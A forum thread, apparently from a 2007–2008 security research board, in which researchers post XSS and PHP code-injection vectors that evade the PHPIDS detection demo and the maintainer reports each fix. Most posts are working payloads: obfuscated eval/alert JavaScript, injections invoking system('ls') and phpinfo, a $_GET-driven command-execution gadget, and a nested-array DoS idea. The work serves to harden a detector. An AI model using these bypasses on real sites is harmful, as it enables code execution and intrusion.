variations on thornmaker's alerts from the other day http://demo.phpids.org/?test=x%3D%21/x/%3F/x/-%2bd%3Aalert%0Ax%280%29 :

?test=x=!/x/?/x/-+d:alert
x(0)

?test=x=!#0={}?/x/-+x:alert
x(0)

?test=x=!disableExternalCapture?/x/-+text_goes_here:alert
x(0)

They can all be extended pretty much the same way for DoctorDan's alerts http://demo.phpids.org/?test=x%3D%21/%5C%5C/%3F%7B%7D%2B1-1%3Aalert%0ax%281%29:

?test=x=!/\\/?{}+1-1:alert
x(1)

EDIT: Fixed encoding/display.

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 12/17/2007 07:32PM by tx.

this one is pretty self explanatory: http://p42.us/phpids/33.html

The JavaScript is:
x=/x/
x.a='n'
x.a=x.a+'ame'
x.b=''.eval
x.a=x.b(x.a)
x.a=x.b(x.a)

Hi!

Wow - those gave me a hard time. I returned from Berlin yesterday night and fixed the first problems with a pretty hot needle. The rule you mentioned was of course buggy - it was meant to be

\s

and not s. This part of the rule was deleted anyway :) I just modified the converter slightly to catch the more complicated ones. Also the centrifuge is now a bit more thorough. Great work guys - 10x!

I think in two or three days we can release 0.4.4.

Greetings,
.mario

More PHP RCE:
http://demo.php-ids.org/?test=%22%3B%7Bif%20%28true%29%20%24_a%5B%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%7D%20//

";{if (true) $_a[]  = system;
$_a[0]( "ls"); } //

";{if (1) $_a[]  = system;
$_a[0]( "ls"); } //

Other ways of getting 'true' http://demo.php-ids.org/?test=%22%3B%7Bif%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a%5B%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%7D%20//

";{if (!($_b[]++%1)) $_a[]  = system;
$_a[0]( "ls"); } //

";{if (pi) $_a[]  = system;
$_a[0]( "ls");  } //

";{if (!a instanceof b) $_a[]  = system;
$_a[0]( "ls"); } //

EDIT: This gets caught (Score: 17), I just thought it was cool http://demo.php-ids.org/?test=%22%3B%7Bif%20%28%24_l%5B%5D%3D_GET%29%20%24_l%3D%26%20%24%24_l%20%5B0%5D%3B%20//%0A%24_a%5B%5D%20%3D%24_l%20%5Bb%5D%20%3B%0A%24_a%20%5B0%5D%20%28%24_l%20%5B%20a%20%5D%20%29%3B%7D%20//:

";{if ($_l[]=_GET) $_l=& $$_l [0]; //
$_a[] =$_l  ;
$_a [0] ($_l [ a ] );} //

It executes $_GET['b']($_GET['a']);

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 12/18/2007 03:49PM by tx.

Nice! I like the method assignment via the implicit push. Fixed...

@.mario: nice fix. I've got a slight variant: http://demo.php-ids.org/?test=%22%3B//%0A%20if%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%20//

";//
 if (!($_b[]++%1)) $_a[0]  = system;
$_a[0]( "ls");  //

EDIT: encoded '+'

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 12/18/2007 10:44PM by tx.

More php code execution, this time with non-alpha non digit:
http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7F%3Dphpinfo%3B%20%24%7F%28%29%3B%20//
This uses chr(0x7f):

?test=";//
 $=phpinfo; $(); //

php allows chars 0x7f-0xff as valid in variable names, meaning this works: http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7f%c9%e0%3Dphpinfo%3B%20%24%7f%c9%e0%28%29%3B%20//
so far 0x7f is the only one I've found that will evade the filter in and of itself though.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 12/19/2007 02:59PM by tx.

This gets through the XSS filters:-
\u50000=1
if(\u50000)\u50001=/eva/[-1]
if(\u50000)\u50002=/aler/[-1]
0[\u50001+'l'](\u50002+'t(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@tx: Wow - I didn't know about that. Normally the char should have been converted by the outOfRange Converter - but I was accidentally using >=128 - not >=127 - 10x!

@Gareth: Fixed ;)

Greetings,
.mario

Multiple semicolons break the comment regex:
http://demo.php-ids.org/?test=%22%3B%3B%20//%0A%20if%20%28%21%28%24_b%5B%5D++%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%21a.%20%22ls%22%29%3B%20%20//

?test=";; //
 if (!($_b[]++%1)) $_a[0]  = system;
$_a[0](!a. "ls");  //

Similar variation: http://demo.php-ids.org/?test=%22%3B%3B//%0Aif%281%29%24_a%5B0%5D%3Dsystem%3B%0A%24_a%5B0%5D%28%21php.%22ls%22%29%3B//

?test=";;//
if(1)$_a[0]=system;
$_a[0](!php."ls");//

-tx @ lowtech-labs.org

70 characters:

x=/eva/i[-1]
$y=/nam/i[-1]
$x$_0=(0)[x+'l']
$x=$x$_0($y+'e')
$x$_0($x)

produces [p42.us].

Note that 0[eval] will no longer work in firefox 3. However all is not lost; x setter=eval still works (though is easily detected by phpids).

@tx: Thanks - I should have though about multiple semicolons :-/ Both ones are fixed!

@thornmaker: Nice - DoctorDan's trick combined with regex modifiers. I didn't concentrate on catching the 0[eval] though but on removing the Library XSS and enhancing some existing ones - so the rules shrank again :)

Greetings and happy holidays!
.mario

http://demo.php-ids.org/?test[]

@Spyware: um - yes?

I just noticed, that if you put [] after the "test" (in the url), it would output "Array". I have never seen any exploits or something using this glitch, but maybe it's exploitable in some way.

I now realize I have posted this in the wrong section of this forum, sorry.

@spyware: I had never seen that before... very interesting.

@.mario: http://p42.us/phpids/35.html

Stefan Esser told me about one DOS attack which returns a white page on certain versions of PHP if you use a long multidimensional array like:-
test[][][][][][][][][]=1 etc

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Spyware: Ah okay - now I get it ;) It's missing validation before output. Thx for pointing out!

@thornmaker: I knew it - damn :) *fixing*



Edited 1 time(s). Last edit at 12/23/2007 06:38AM by .mario.

http://p42.us/phpids/36.html

[Edit] added the following JavaScript for this one:
$x=(/val/)[-1]
$z=/nam/
$x=(0)['e'+$x]
$z=$z[-1]+'e'
$x($x($z)+'x')



Edited 1 time(s). Last edit at 12/29/2007 12:54PM by thornmaker.

This is somewhat similar to thornmaker's above...
$y=('eva')
$z={}[$y+'l']
$y=('aler')
$y+=(/t(1)/)[-1]
$z($y)

[$y=('al')]&&[$z=$y]&&[$z+=('ert')+[]][DocDan=(/ev/)[-1]+$y]($z).valueOf()(1)

EDIT: if I remember correctly, this may only work in FF2



Edited 1 time(s). Last edit at 12/30/2007 02:48PM by DoctorDan.

DoctorDan: both are good finds!

Hey!

Yep - very nice ones indeed! I just returned from 24C3 and fixed the stuff - this time by doing some work on the centrifuge. I am not already sure that this fix will really work but let's see. I implemented a kind of ratio-check depending on the ration between string length and amount of certain special chars.

Greetings, 10x and happy new year!
.mario

i've been losing track of the filtering behind the centrifuge... is this page no longer current?

Ah no - that was just the alpha version. The current revision can be found here (very last method).

This was super hard to sneak under the centrifuge:
http://demo.php-ids.org/?test=%22%3B%20e%7C%24a%3D%26%24_GET%3B%200%7C%24b%3D%21a%20.%24a%5Bb%5D%3B%24a%5Ba%5D%28%60%24b%60%29%3B//

?test="; e|$a=&$_GET; 0|$b=!a .$a;$a[a](`$b`);//

Even shorter:

?test="; e|$a=&$_GET; $a[a](`$a`);//

The code executes $_GET['a'](`$_GET['b']`) as in

http://localhost/rce.php
?eval="; e|$a=&$_GET; $a[a](`$a`);//
&a=printf
&b=touch some_file

EDIT: So $_GET['a'] would have to be a function like printf,sprintf,etc. and $_GET['b'] is what whould pass through to the command line.

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 01/04/2008 04:22PM by tx.

Nice circumvention! Just fixed the issue and extended the tests with this kind of vectors. 10x!

Greetings,
.mario

tx u rule! hehe top work!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/04/2008 07:12PM by Gareth Heyes.

@Gareth,.mario: thx :)

I've got another. This is a variation on DoctorDan's vector, shortened to sneak under the centrifuge, which required a few other minor changes:
http://demo.phpids.org/?test=%5B%24y%3D%28%27al%27%29%5D%26%5B%24z%3D%24y+%27ert%27%5D%5Ba%3D%281%3F/ev/%3A0%29%5B-1%5D+%24y%5D%28%24z%29%281%29

[$y=('al')]&[$z=$y+'ert'][a=(1?/ev/:0)[-1]+$y]($z)(1)

Only tested in FF2, I don't know if it works in IE.

-tx @ lowtech-labs.org

Hi!

Wow - this is a nice one. DoctorDan's array to string conversion combined with a ternary test.

Thx!
.mario